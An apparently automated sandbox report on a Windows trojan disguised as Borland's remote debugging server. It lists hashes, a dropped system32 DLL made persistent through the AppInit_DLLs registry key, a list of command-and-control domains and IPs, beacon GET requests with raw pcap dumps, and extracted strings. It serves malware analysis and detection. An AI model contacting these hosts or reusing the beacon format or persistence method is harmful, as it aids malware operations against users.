Analysis Date2014-06-20 20:14:42
MD50bcda7a0677feda57921a365ee36fc5a
SHA101db27752ec64f6e7eaa81fb8d562dbb6b6f7be7

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 792baf13262e10490aec0865cdc01d26 sha1: c8464edf9eb5df9f61300186703a6605c5ee020e size: 90112
Section_ASM2 md5: 97f2ee690c601193ee15b7feb5420244 sha1: de7a2d8a5919212880fb99698b10421246d8e618 size: 62464
Section.rdata md5: 913d0084f4ed72645f74a09d33275529 sha1: 5f52630f45ae461a989b751761e3dbfb77fe789a size: 8192
Section.data md5: b2ab0093b3594d84da4a4b5c38de6104 sha1: d26c51d9a2862a5fc90bcd2c1f0247fd4dc3f1c3 size: 5120
Section.tls md5: bf619eac0cdf3f68d496ea9344137e8b sha1: 5c3eb80066420002bc3dcc7ca4ab6efad7ed4ae5 size: 512
Section.rsrc md5: 0700f6ce8a5c5f57f0abb43c0bfc0e28 sha1: 013ef4a4db6e77f6a2b3b73eb17e54ab68d4b788 size: 17920
Timestamp2012-09-17 04:33:23
VersionLegalCopyright: Copyright © Borland Software Corporation 1990, 2001
InternalName: BORDBG61
FileVersion: 70.08.08.1442
CompanyName: Borland Software Corporation
ProductName: Borland Remote Debugging Server
ProductVersion: 51.00
FileDescription: Borland Remote Debugging Server
OriginalFilename: bordbg61.exe
PackerMicrosoft Visual C++ ?.?
PEhashca671bb93c526fd66343d82a84d1ea904cdf3dcf
IMPhash7a869870f7ecafc77758c3c856dca578

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Creates FileC:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg

Process
↳ C:\WINDOWS\Explorer.EXE

RegistryHKEY_CURRENT_USER\SessionInformation\ProgramCount ➝
NULL
Creates FileC:\WINDOWS\system32\tpzfwxd.dll
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Cookies\cf
Deletes FileC:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Deletes FileC:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Creates ProcessC:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Winsock DNS91.233.89.106
Winsock DNSclickbeta.ru
Winsock DNSdenadb.com
Winsock DNSterrans.su
Winsock DNSnsknock.com
Winsock DNStryatdns.com
Winsock DNSclickclans.ru
Winsock DNSdenareclick.com
Winsock DNSfescheck.com
Winsock DNSinstrango.com
Winsock DNStegimode.com
Winsock DNSnetrovad.com
Winsock DNSnshouse1.com
Winsock DNSforadns.com
Winsock DNSgetavodes.com
Winsock DNSclickstano.com

Process
↳ C:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg

RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs ➝
C:\WINDOWS\system32\tpzfwxd.dll\\x00

Network Details:

DNSgetavodes.com
Type: A
208.73.211.240
DNSgetavodes.com
Type: A
208.73.211.237
DNSgetavodes.com
Type: A
208.73.211.179
DNSgetavodes.com
Type: A
208.73.210.210
DNSgetavodes.com
Type: A
208.73.211.250
DNStryatdns.com
Type: A
208.73.211.246
DNStryatdns.com
Type: A
208.73.211.235
DNStryatdns.com
Type: A
208.73.211.233
DNStryatdns.com
Type: A
208.73.211.174
DNStryatdns.com
Type: A
208.73.210.219
DNSfescheck.com
Type: A
208.73.210.210
DNSfescheck.com
Type: A
208.73.211.250
DNSfescheck.com
Type: A
208.73.211.240
DNSfescheck.com
Type: A
208.73.211.237
DNSfescheck.com
Type: A
208.73.211.179
DNSinstrango.com
Type: A
91.237.88.245
DNSnsknock.com
Type: A
208.73.210.219
DNSnsknock.com
Type: A
208.73.211.246
DNSnsknock.com
Type: A
208.73.211.235
DNSnsknock.com
Type: A
208.73.211.233
DNSnsknock.com
Type: A
208.73.211.174
DNStegimode.com
Type: A
208.73.210.205
DNStegimode.com
Type: A
208.73.210.203
DNStegimode.com
Type: A
208.73.211.249
DNStegimode.com
Type: A
208.73.211.246
DNStegimode.com
Type: A
208.73.211.173
DNSdenadb.com
Type: A
208.73.211.173
DNSdenadb.com
Type: A
208.73.210.205
DNSdenadb.com
Type: A
208.73.210.203
DNSdenadb.com
Type: A
208.73.211.249
DNSdenadb.com
Type: A
208.73.211.246
DNSforadns.com
Type: A
208.73.211.193
DNSforadns.com
Type: A
208.73.211.175
DNSforadns.com
Type: A
208.73.211.174
DNSforadns.com
Type: A
208.73.211.163
DNSforadns.com
Type: A
208.73.211.242
DNSnshouse1.com
Type: A
208.73.210.219
DNSnshouse1.com
Type: A
208.73.211.246
DNSnshouse1.com
Type: A
208.73.211.235
DNSnshouse1.com
Type: A
208.73.211.233
DNSnshouse1.com
Type: A
208.73.211.174
DNSnetrovad.com
Type: A
DNSterrans.su
Type: A
DNSclickstano.com
Type: A
DNSdenareclick.com
Type: A
DNSclickbeta.ru
Type: A
DNSclickclans.ru
Type: A
HTTP GEThttp://getavodes.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1907&av=0&vm=0&al=0&p=39&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/Wt0CBpNyQ83tzAC/Wy7OUTyhT8vybgFUy5d1av4q30
User-Agent:
HTTP GEThttp://tryatdns.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1907&av=0&vm=0&al=0&p=39&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/Wt0CBpNyQ83tzAC/Wy7OUTyhT8vybgFXAIv19684av
User-Agent:
HTTP GEThttp://fescheck.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1907&av=0&vm=0&al=0&p=39&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/Wt0CBpNyQ83tzAC/Wy7OUTyhT8vybgFZV9ICkLeApZ
User-Agent:
HTTP GEThttp://instrango.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1907&av=0&vm=0&al=0&p=39&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/Wt0CBpNyQ83tzAC/Wy7OUTyhT8vybgFae8jaumoKIW
User-Agent:
HTTP GEThttp://nsknock.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1907&av=0&vm=0&al=0&p=39&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/Wt0CBpNyQ83tzAC/Wy7OUTyhT8vybgFX0Ru3ub0v/f
User-Agent:
HTTP GEThttp://tegimode.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1907&av=0&vm=0&al=0&p=39&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/Wt0CBpNyQ83tzAC/Wy7OUTyhT8vybgFeGADdtQCu/8
User-Agent:
HTTP GEThttp://denadb.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1907&av=0&vm=0&al=0&p=39&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/Wt0CBpNyQ83tzAC/Wy7OUTyhT8vybgFcqdC5CdhLuy
User-Agent:
HTTP GEThttp://foradns.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1907&av=0&vm=0&al=0&p=39&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/Wt0CBpNyQ83tzAC/Wy7OUTyhT8vybgFecLi8e91jmJ
User-Agent:
HTTP GEThttp://nshouse1.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1907&av=0&vm=0&al=0&p=39&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/Wt0CBpNyQ83tzAC/Wy7OUTyhT8vybgFXEz7FmaMbYq
User-Agent:
HTTP GEThttp://91.233.89.106/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1907&av=0&vm=0&al=0&p=39&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/Wt0CBpNyQ83tzAC/Wy7OUTyhT8vybgFemhxMpm8S9L
User-Agent:
Flows TCP192.168.1.1:1031 ➝ 208.73.211.240:80
Flows TCP192.168.1.1:1032 ➝ 208.73.211.246:80
Flows TCP192.168.1.1:1033 ➝ 208.73.210.210:80
Flows TCP192.168.1.1:1034 ➝ 91.237.88.245:80
Flows TCP192.168.1.1:1035 ➝ 208.73.210.219:80
Flows TCP192.168.1.1:1036 ➝ 208.73.210.205:80
Flows TCP192.168.1.1:1037 ➝ 208.73.211.173:80
Flows TCP192.168.1.1:1038 ➝ 208.73.211.193:80
Flows TCP192.168.1.1:1039 ➝ 208.73.210.219:80
Flows TCP192.168.1.1:1040 ➝ 91.233.89.106:80

Raw Pcap
0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 39303726   XX0000&key=1907&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d333926 6f733d35 2e312e32 3630302e   =39&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79672f57 74304342 704e7951 3833747a   yg/Wt0CBpNyQ83tz
0x000000b0 (00176)   41432f57 79374f55 54796854 38767962   AC/Wy7OUTyhT8vyb
0x000000c0 (00192)   67465579 35643161 76347133 30204854   gFUy5d1av4q30 HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a206765   TP/1.1..Host: ge
0x000000e0 (00224)   7461766f 6465732e 636f6d0d 0a0d0a     tavodes.com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 39303726   XX0000&key=1907&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d333926 6f733d35 2e312e32 3630302e   =39&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79672f57 74304342 704e7951 3833747a   yg/Wt0CBpNyQ83tz
0x000000b0 (00176)   41432f57 79374f55 54796854 38767962   AC/Wy7OUTyhT8vyb
0x000000c0 (00192)   67465841 49763139 36383461 76204854   gFXAIv19684av HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a207472   TP/1.1..Host: tr
0x000000e0 (00224)   79617464 6e732e63 6f6d0d0a 0d0a0a     yatdns.com.....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 39303726   XX0000&key=1907&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d333926 6f733d35 2e312e32 3630302e   =39&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79672f57 74304342 704e7951 3833747a   yg/Wt0CBpNyQ83tz
0x000000b0 (00176)   41432f57 79374f55 54796854 38767962   AC/Wy7OUTyhT8vyb
0x000000c0 (00192)   67465a56 3949436b 4c654170 5a204854   gFZV9ICkLeApZ HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a206665   TP/1.1..Host: fe
0x000000e0 (00224)   73636865 636b2e63 6f6d0d0a 0d0a0a     scheck.com.....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 39303726   XX0000&key=1907&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d333926 6f733d35 2e312e32 3630302e   =39&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79672f57 74304342 704e7951 3833747a   yg/Wt0CBpNyQ83tz
0x000000b0 (00176)   41432f57 79374f55 54796854 38767962   AC/Wy7OUTyhT8vyb
0x000000c0 (00192)   67466165 386a6175 6d6f4b49 57204854   gFae8jaumoKIW HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a20696e   TP/1.1..Host: in
0x000000e0 (00224)   73747261 6e676f2e 636f6d0d 0a0d0a     strango.com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 39303726   XX0000&key=1907&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d333926 6f733d35 2e312e32 3630302e   =39&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79672f57 74304342 704e7951 3833747a   yg/Wt0CBpNyQ83tz
0x000000b0 (00176)   41432f57 79374f55 54796854 38767962   AC/Wy7OUTyhT8vyb
0x000000c0 (00192)   67465830 52753375 6230762f 66204854   gFX0Ru3ub0v/f HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a206e73   TP/1.1..Host: ns
0x000000e0 (00224)   6b6e6f63 6b2e636f 6d0d0a0d 0a0d0a     knock.com......

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 39303726   XX0000&key=1907&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d333926 6f733d35 2e312e32 3630302e   =39&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79672f57 74304342 704e7951 3833747a   yg/Wt0CBpNyQ83tz
0x000000b0 (00176)   41432f57 79374f55 54796854 38767962   AC/Wy7OUTyhT8vyb
0x000000c0 (00192)   67466547 41446474 5143752f 38204854   gFeGADdtQCu/8 HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a207465   TP/1.1..Host: te
0x000000e0 (00224)   67696d6f 64652e63 6f6d0d0a 0d0a0a     gimode.com.....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 39303726   XX0000&key=1907&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d333926 6f733d35 2e312e32 3630302e   =39&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79672f57 74304342 704e7951 3833747a   yg/Wt0CBpNyQ83tz
0x000000b0 (00176)   41432f57 79374f55 54796854 38767962   AC/Wy7OUTyhT8vyb
0x000000c0 (00192)   67466371 64433543 64684c75 79204854   gFcqdC5CdhLuy HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a206465   TP/1.1..Host: de
0x000000e0 (00224)   6e616462 2e636f6d 0d0a0d0a 0d0a0a     nadb.com.......

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 39303726   XX0000&key=1907&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d333926 6f733d35 2e312e32 3630302e   =39&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79672f57 74304342 704e7951 3833747a   yg/Wt0CBpNyQ83tz
0x000000b0 (00176)   41432f57 79374f55 54796854 38767962   AC/Wy7OUTyhT8vyb
0x000000c0 (00192)   67466563 4c693865 39316a6d 4a204854   gFecLi8e91jmJ HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a20666f   TP/1.1..Host: fo
0x000000e0 (00224)   7261646e 732e636f 6d0d0a0d 0a0a0a     radns.com......

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 39303726   XX0000&key=1907&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d333926 6f733d35 2e312e32 3630302e   =39&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79672f57 74304342 704e7951 3833747a   yg/Wt0CBpNyQ83tz
0x000000b0 (00176)   41432f57 79374f55 54796854 38767962   AC/Wy7OUTyhT8vyb
0x000000c0 (00192)   67465845 7a37466d 614d6259 71204854   gFXEz7FmaMbYq HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a206e73   TP/1.1..Host: ns
0x000000e0 (00224)   686f7573 65312e63 6f6d0d0a 0d0a0a     house1.com.....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 39303726   XX0000&key=1907&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d333926 6f733d35 2e312e32 3630302e   =39&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79672f57 74304342 704e7951 3833747a   yg/Wt0CBpNyQ83tz
0x000000b0 (00176)   41432f57 79374f55 54796854 38767962   AC/Wy7OUTyhT8vyb
0x000000c0 (00192)   6746656d 68784d70 6d385339 4c204854   gFemhxMpm8S9L HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a203931   TP/1.1..Host: 91
0x000000e0 (00224)   2e323333 2e38392e 3130360d 0a0d0a     .233.89.106....


Strings
P
[..
.
auriVttcetorlauri
\
.CC
 
.
....r)..
..

040904E4
1Cycle through the possible initial break settings9Request that the debugger resynchronize with the debuggee
1Display debugger and debuggee version information
51.00
70.08.08.1442
7Set the initial command for new command browser windows!Toggle the verbose output setting2Display the debugger time for every debuggee event1Display debugger and debuggee version information
8Configure mapping from file extension to source language
About WinDbg
Activate window
BINARY
BORDBG61
bordbg61.exe
Borland Remote Debugging Server
Borland Software Corporation
 Borland Software Corporation 1990, 2001
Cascade all floating windows&Horizontally tile all floating windows$Vertically tile all floating windows
Close all source windows-Close all windows that are error placeholders"Open a new docked window container
CompanyName
Copyright 
CWindowClass
Debug operations
Detach the current program
Display source when possibleGPerform symbol resolution for symbol strings without a module qualifier
Dock all undocked windows
FileDescription
FileVersion
                                 H
         (((((                  H
Halt the current program
Help contents and searches
         h((((                  H
InternalName
iphapi32.dll
KERNEL32.DLL
Kernel debugging control.Cycle through the available baud rate settings
LegalCopyright
Manage event filters
Manage open windows
:Manage windows using the Multiple Document Interface styleDAutomatically open a disassembly window when source is not available
mscoree.dll
Open a command browser window
Open the command window
Open the disassembly window
Open the help index
Open the help search dialog
Open the help table of contents)Open the help for the current window type)Open help for the currently selected text
"Open the process and thread window
Open the registers window
Open the scratch pad window"Open the process and thread window
OriginalFilename
ProductName
ProductVersion
Restart the Program"Stop debugging the current program
Run the Program)Handle the exception and continue running1Do not handle the exception, but continue running
Step over the next statement Step out of the current function1Run the program to the line containing the cursor
StringFileInfo
sXf+
Toggle the status bar on or off
Toggle the status bar on or off,View or edit the font for the current window
Toggle the toolbar on or off
Trace into the next statement
Translation
Undock all docked windows
VarFileInfo
View program options
View the module list
View WinDbg's command line
VS_VERSION_INFO
 Window arrangement and selection
                          
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
07yi~Qa
0A@@Ju
0SSSSS
'17Ds_zd
1cbCtd
1'fNWc
^1g0lM
,1<!MQ]Amqza
-1=!MQZAjqza
=.1^!{Tj
]29&	d
2d2!q/
2^Fwv~
-2\xlh
3_Gsw1
"3Qpff
3qzD5.[
3U'Dv+K
4psC)D9
\4XOHI
5$ 0	R
6Ed3\"
6gf7YJp
6W<YmG
7G(C7RP
7G(R7_P
7G(V7OP
7RichNP
^>7.Sh
8UpCg!wQd
8Y\)	E
 8Z\Qe
8z$xvz
9QaAeq
9.`r"E
9V	{bJ
A9Q>a%
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
ac='e~
ADVAPI32.dll
AGFwY$
&akqWaJ~l
A	n&"[
An application has made an attempt to load the C runtime library incorrectly.
aNU`'2
APQAk;Vk
Aq1a!Q
a*Q:AJ3
_AQ;O!G
$ArJq+k
`_ASM2
- Attempt to initialize the CRT more than once.
- Attempt to use MSIL code from this assembly during native code initialization
August
BeginPaint
bI3p4#
b.iK& ^
bjLG~n--l
(b'"S?\
B	s6[SK
ByEIeYE)
BY INSTALLING AND USING THIS SOFTWARE, YOU ARE CONSENTING TO BE BOUND BY AND ARE BECOMING A PARTY TO THIS AGREEMENT. IF YOU DO NOT AGREE TO ALL OF THE TERMS OF THIS AGREEMENT, CLICK THE "CANCEL" BUTTON AND THE INSTALLATION PROCESS WILL NOT CONTINUE. IF THESE TERMS ARE CONSIDERED AN OFFER, ACCEPTANCE IS EXPRESSLY LIMITED TO THESE TERMS. 
c^CXK	
CloseHandle
C;N&K&
CorExitProcess
C.q'}<8
CreateBitmap
Created and produced by Whole Tomato, Inc., 1733 Fessler St., Englewood, FL, USA, (408) 323-1590, info@wholetomato.com, www.wholetomato.com.
CreateWindowExA
- CRT not initialized
DANkjy
@.data
DDDDDDDD
dddd, MMMM dd, yyyy
December
DecodePointer
DefWindowProcA
DeleteCriticalSection
%dglK%
DISCLAIMER OF WARRANTY. THE SOFTWARE, AND ANY SERVICES THAT YOU RECEIVE FROM WHOLE TOMATO ARE PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND. WHOLE TOMATO HEREBY DISCLAIMS ALL EXPRESS OR IMPLIED WARRANTIES, INCLUDING WITHOUT LIMITATION WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, AND NON-INFRINGEMENT. THIS DISCLAIMER OF WARRANTY CONSTITUTES AN ESSENTIAL PART OF THIS AGREEMENT. SOME STATES DO NOT ALLOW EXCLUSIONS OF AN IMPLIED WARRANTY, SO THIS DISCLAIMER MAY NOT APPLY TO YOU AND YOU MAY HAVE OTHER LEGAL RIGHTS THAT VARY FROM STATE TO STATE OR BY JURISDICTION. 
DispatchMessageA
\+(-DJ
DOMAIN error
DrawTextA
DsC!u_[n
D	xJB2_
#e9%8#w
~Ef5h!
EKg?>/XI3n"	
EncodePointer
EndPaint
EnterCriticalSection
ExitProcess
EXPORT CONTROLS. You shall comply with all export laws and restrictions and regulations of the Department of Commerce, the United States Department of Treasury Office of Foreign Assets Control ("OFAC"), or other United States or foreign agency or authority, and not to export, or allow the export or re-export of the Software in violation of any such restrictions, laws or regulations (including, without limitation, export or re-export to destinations prohibited either in Country Groups Q, S, W, Y or Z country specified in the then current Supplement No. 1 to Section 770 of the U.S. Export Administration Regulations (or any successor supplement or regulations), or the OFAC regulations found at 31 C.F.R. 500 et seq.). By installing or using the Software, you are agreeing to the foregoing and you are representing and warranting that you are not located in, under the control of, or a national or resident of any restricted country or on any such list. 
F*_2km
FAw/-yv
FC	p==
February
FindWindowA
- floating point support not loaded
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
_F nNz
fqw`FPV@
FreeEnvironmentStringsA
FreeEnvironmentStringsW
Friday
f'TWDGIkd{
F#'zx:
GA*PH]x
GDI32.dll
GetACP
GetActiveWindow
GetClientRect
GetCommandLineA
GetCPInfo
GetCurrentProcess
GetCurrentProcessId
GetCurrentThreadId
GetDeviceCaps
GetEnvironmentStrings
GetEnvironmentStringsW
GetFileType
GetLastActivePopup
GetLastError
GetLocaleInfoA
GetMessageA
GetModuleFileNameA
GetModuleHandleW
GetOEMCP
GetProcAddress
GetProcessWindowStation
GetStartupInfoA
GetStdHandle
GetStringTypeA
